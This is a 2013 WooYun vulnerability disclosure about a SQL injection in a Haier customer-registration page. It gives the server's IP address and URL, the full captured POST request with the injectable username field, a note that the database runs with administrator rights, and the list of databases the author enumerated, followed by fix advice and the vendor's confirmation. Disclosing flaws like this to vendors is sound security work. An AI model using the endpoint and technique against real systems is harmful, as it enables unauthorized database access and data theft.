当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034017

漏洞标题:海尔集团之9当SQL Injection遭遇SSL

相关厂商:海尔集团

漏洞作者: 小胖子

提交时间:2013-08-10 08:58

修复时间:2013-09-24 08:58

公开时间:2013-09-24 08:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-10: 细节已通知厂商并且等待厂商处理中
2013-08-13: 厂商已经确认,细节仅向厂商公开
2013-08-23: 细节向核心白帽子及相关领域专家公开
2013-09-02: 细节向普通白帽子公开
2013-09-12: 细节向实习白帽子公开
2013-09-24: 细节向公众公开

简要描述:

小胖子正在暴走!!
小胖子已经如同神一般了!!求求谁去杀了他吧!!
这回不是老系统了吧,我找到了你们的新C段,哈哈

详细说明:

系统地址:
海尔TRC系统https://58.56.128.8/tcs

.jpg


其实SQL Injection遭遇SSL的时候是很难过的,常规工具不好用,直接停止工作,所以需要抓一下SSL的包。
这个过程我想我会写一个drops到乌云。
登陆的地方没有验证,但是貌似又预编译,没射成功,就找到了如下地址。
https://58.56.128.8/tcs/Frm_HaierCustReg.aspx
在这里注册的时候,检测用户名时候可用,直接带进数据库查询的,导致注入。

.jpg


千辛万苦抓了包。

POST https://58.56.128.8/tcs/Frm_HaierCustReg.aspx HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://58.56.128.8/tcs/Frm_HaierCustReg.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 58.56.128.8
Content-Length: 2130
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=icmldl55rqjvub45pfwgyy2t
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=dDwyODI4MzgyNzA7dDw7bDxpPDE%2BOz47bDx0PDtsPGk8NT47aTw3PjtpPDEzPjtpPDIzPjtpPDI1Pjs%2BO2w8dDx0PHA8cDxsPERhdGFUZXh0RmllbGQ7RGF0YVZhbHVlRmllbGQ7PjtsPGNkZXBBYmJOYW1lO2RlcGNvZGU7Pj47Pjt0PGk8NTM%2BO0A8LS3or7fpgInmi6ktLTvljJfkuqw75aSp5rSlO%2BWUkOWxsTvlkbzlkozmtannibk755%2Bz5a625bqEO%2BWkquWOnzvkuIrmtbc75p2t5beeO%2BWNl%2BS6rDvlroHms6I75peg6ZShO%2Ba1juWNlzvlvpDlt54754Of5Y%2BwO%2Ba1juWugTvpnZLlsps75ZCI6IKlO%2BWNl%2BaYjDvmsojpmLM76ZW%2F5pilO%2BmUpuW3njvlpKfov5475ZOI5bCU5ruoO%2Bilv%2BWuiTvlhbDlt5476ZO25bedO%2Bilv%2BWugTvkuYzpsoHmnKjpvZA75oiQ6YO9O%2BmHjeW6hjvotLXpmLM75piG5piOO%2BW5v%2BW3njvmt7HlnLM756aP5beeO%2BWOpumXqDvmtbflj6M75Y2X5a6BO%2BatpuaxiTvpg5Hlt5476ZW%2F5rKZO%2BilhOaoijvnlJ%2FnianljLvnlpc7RVBHO%2BaAu%2BWFrOWPuDvpgJrorq876K6h566X5py6O%2BeUteacujvnlLXmjqc75paw5p2Q5paZO%2BeJuemSojvnvo7lsJTnsonmnKs7PjtAPC0t6K%2B36YCJ5oupLS07MTAxMDEwMTsxMDEwMTAyOzEwMTAxMDM7MTAxMDEwNDsxMDEwMjAxOzEwMTAyMDI7MTAxMDMwMTsxMDEwMzAyOzEwMTAzMDM7MTAxMDMwNDsxMDEwMzA1OzEwMTA0MDE7MTAxMDQwMjsxMDEwNDAzOzEwMTA0MDQ7MTAxMDQwNTsxMDEwNTAxOzEwMTA1MDI7MTAxMDYwMTsxMDEwNjAyOzEwMTA2MDM7MTAxMDYwNDsxMDEwNjA1OzEwMTA3MDE7MTAxMDcwMjsxMDEwNzAzOzEwMTA3MDQ7MTAxMDcwNTsxMDEwODAxOzEwMTA4MDI7MTAxMDgwMzsxMDEwODA0OzEwMTA5MDE7MTAxMDkwMjsxMDEwOTAzOzEwMTA5MDQ7MTAxMDkwNTsxMDEwOTA2OzEwMTEwMDE7MTAxMTAwMjsxMDExMDAzOzEwMTEwMDQ7MTAxMjAwMTsxMDEyMDAyOzEwMTIwMDM7MTAxMjAwNDsxMDEyMDA2OzEwMTMwMDE7MTAxMzAwMjsxMDEzMDAzOzEwMTMwMDQ7MTAxMzAwNTs%2BPjs%2BOzs%2BO3Q8dDw7O2w8aTwwPjs%2BPjs7Pjt0PHQ8cDxwPGw8RGF0YVRleHRGaWVsZDtEYXRhVmFsdWVGaWVsZDs%2BO2w8Y3JvbGVuYW1lO2Nyb2xlY29kZTs%2BPjs%2BO3Q8aTw0PjtAPC0t6K%2B36YCJ5oupLS075oC757uP55CGO%2Bi0ouWKoeS6uuWRmDvkuJrliqHkurrlkZg7PjtAPC0t6K%2B36YCJ5oupLS07MTAwMTg7MTAwMTk7MTAwMjA7Pj47Pjs7Pjt0PHA8O3A8bDxvbmNsaWNrOz47bDxyZXR1cm4gQ2hlY2soKVw7Oz4%2BPjs7Pjt0PHA8O3A8bDxvbmNsaWNrOz47bDxqYXZhc2NyaXB0OndpbmRvdy5jbG9zZSgpXDs7Pj4%2BOzs%2BOz4%2BOz4%2BOz78LmESah3PB70h35k8zD7kl45DmA%3D%3D&Texusername=a&btn_test=%E6%B5%8B%E8%AF%95%E8%B4%A6%E5%8F%B7&ddlGM=--%E8%AF%B7%E9%80%89%E6%8B%A9--&ddlCustType=0&txtusercode=&txtUserName=&Drprole=--%E8%AF%B7%E9%80%89%E6%8B%A9--&txtEmail=&txttel=&TxtCustDJNum=&GMCode=&Hcustcode_sp=


肯定是注入了。

SQLIN.jpg


数据库权限永远很高

DBA.jpg


得到的数据库,想进去看看jump了下表,抱歉。

.jpg


数据库

available databases [8]:
[*] CMI
[*] Invoice
[*] lumigent
[*] master
[*] model
[*] msdb
[*] TCS
[*] tempdb

漏洞证明:

available databases [8]:
[*] CMI
[*] Invoice
[*] lumigent
[*] master
[*] model
[*] msdb
[*] TCS
[*] tempdb

修复方案:

0x1:账户权限过高。
0x2:过滤。任何post都不能放过,SSL也不是万能的。

版权声明:转载请注明来源 小胖子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-08-13 08:53

厂商回复:

感谢 @小胖子 的工作。
漏洞描述:在客户注册时进行账号测试的时候使用了数据库的管理员用户,导致可以访问系统表,可以查询到TCS系统中的数据表。这个漏洞预计在2013-08-13晚上程序发布时修复。
请白帽子们持续友好监督海尔信息安全工作,非常感谢。
另外1,我看经常有人评论或留言时出现错误,现给各位普及一下:海尔不是国企。
另外2,海尔有人做网络,但是海尔首先是制造业,并不是IT业,百度、淘宝、新浪等有一样有漏洞,海尔也不可避免,能有各位帮助监督整改,海尔表示非常感谢。
另外3,海尔希望曝出问题和漏洞,然后针对性整改,就像当年张首席砸冰箱一样,条条大路通罗马,保证质量的友好真诚行为,海尔一概接受,并不会出现抓狂情况。
以上,仅供参考,如有不明,请跟贴。

最新状态:

暂无